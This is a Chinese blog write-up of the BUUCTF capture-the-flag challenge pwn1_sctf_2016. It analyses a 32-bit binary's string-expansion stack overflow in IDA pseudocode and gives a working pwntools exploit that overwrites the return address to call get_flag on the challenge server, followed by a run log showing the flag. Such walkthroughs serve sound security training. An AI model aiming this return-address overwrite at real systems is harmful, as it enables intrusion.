  • BUUCTF-PWN爬坑-04-pwn1_sctf_2016

    pwn1_sctf_2016

    file

    root@kali:~/Downloads# file pwn1_sctf_2016 
    pwn1_sctf_2016: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.24, BuildID[sha1]=4b1df4d30f1d6b75666c64bed078473a4ad8e799, not stripped
    

    checksec

    root@kali:~/Downloads# checksec pwn1_sctf_2016 
    [*] '/root/Downloads/pwn1_sctf_2016'
        Arch:     i386-32-little
        RELRO:    Partial RELRO
        Stack:    No canary found
        NX:       NX enabled #//栈不可执行
        PIE:      No PIE
    

    IDA

    // IDA (Hex-Rays) pseudocode of the binary's entry point: every piece of
    // input handling is delegated to vuln(); main itself touches no user data.
    int __cdecl main(int argc, const char **argv, const char **envp)
    {
      vuln();
      return 0;
    }
    
    // IDA (Hex-Rays) pseudocode. The address comments give the frame layout:
    // `s` lives at ebp-0x3C, i.e. 60 bytes below the saved ebp, and the other
    // locals (v3..v7) are packed between it and the frame pointer.
    //
    // Root cause of the overflow: the read is bounded (fgets, 32 bytes), but the
    // data is then expanded by the "I" -> "you" replacement (1 byte becomes 3)
    // and copied back into `s` with an unbounded strcpy, so a short input can
    // grow past the 60 bytes separating `s` from the saved ebp and return
    // address. With no stack canary (see checksec above) nothing detects this.
    // Mitigation: copy with an explicit bound (strncpy/snprintf with the buffer
    // size) or reject inputs whose expanded length no longer fits the buffer.
    int vuln()
    {
      const char *v0; // eax
      char s; // [esp+1Ch] [ebp-3Ch]   destination buffer; 60 bytes up to saved ebp
      char v3; // [esp+3Ch] [ebp-1Ch]
      char v4; // [esp+40h] [ebp-18h]
      char v5; // [esp+47h] [ebp-11h]
      char v6; // [esp+48h] [ebp-10h]
      char v7; // [esp+4Fh] [ebp-9h]
    
      printf("Tell me something about yourself: ");
      // Read is bounded to 32 bytes (31 characters + NUL). `edata` is how IDA
      // resolved the FILE* argument; presumably stdin, not verifiable from here.
      fgets(&s, 32, edata);  // input limited to 32 bytes
      std::string::operator=(&input, &s);
      std::allocator<char>::allocator(&v5);
      std::string::string(&v4, "you", &v5);
      std::allocator<char>::allocator(&v7);
      std::string::string(&v6, "I", &v7);
      replace((std::string *)&v3);
      // IDA's resolution of this call is unreliable; per the author every "I"
      // in `input` is replaced by "you", which is what lengthens the string.
      std::string::operator=(&input, &v3, &v6, &v4); // replace "I" with "you"
      std::string::~string((std::string *)&v3);
      std::string::~string((std::string *)&v6);
      std::allocator<char>::~allocator(&v7);
      std::string::~string((std::string *)&v4);
      std::allocator<char>::~allocator(&v5);
      v0 = (const char *)std::string::c_str((std::string *)&input);
      // Unbounded copy of the expanded string back into `s`: this is the
      // overflow. Anything beyond 60 bytes overwrites the saved ebp and then
      // the return address.
      strcpy(&s, v0);
      // Fixed format string; the user data is only an argument, so no format-string issue here.
      return printf("So, %s
    ", &s);
    }
    // Never reached from main(); it exists as a ready-made target, which is why
    // a plain return-address overwrite is enough here despite NX being enabled.
    int get_flag()
    {
      return system("cat flag.txt");
    }
    
    char s; // [esp+1Ch] [ebp-3Ch] #s:60个字符大小
    v0 = (const char *)std::string::c_str((std::string *)&input); 
    strcpy(&s, v0); //溢出区域
    
    #get_flag	.text	08048F0D	00000014	0000001C	00000000	R	.	.	.	B	.	.
    
    from pwn import *  # pwntools; third-party, not part of the standard library
    
    ip='node3.buuoj.cn'
    port=26973
    p = remote(ip,port)
    
    # NOTE(review): misleading name -- this is the address of get_flag() taken
    # from the IDA function table above, not a "/bin/sh" string.
    bin_sh =0x08048F0D
    
    # Layout follows the frame in vuln(): `s` is 60 bytes below the saved ebp.
    # 20 'I' are expanded server-side to 60 bytes of "you" (filling up to the
    # saved ebp), 4 filler bytes cover the saved ebp, and p32() places the
    # get_flag address where the return address is stored.
    payload = 20*b'I' + 4*b'b'+ p32(bin_sh)
    
    p.sendline(payload)
    p.interactive()
    
    root@kali:~/Downloads# python3 pwn1_sctf_2016_exp.py 
    [+] Opening connection to node3.buuoj.cn on port 26973: Done
    [*] Switching to interactive mode
    flag{4068ba06-f18b-4da9-b56a-70d655103e28}
    timeout: the monitored command dumped core
    [*] Got EOF while reading in interactive
    $ ls
    
  • 原文地址:https://www.cnblogs.com/moke-cn/p/14329959.html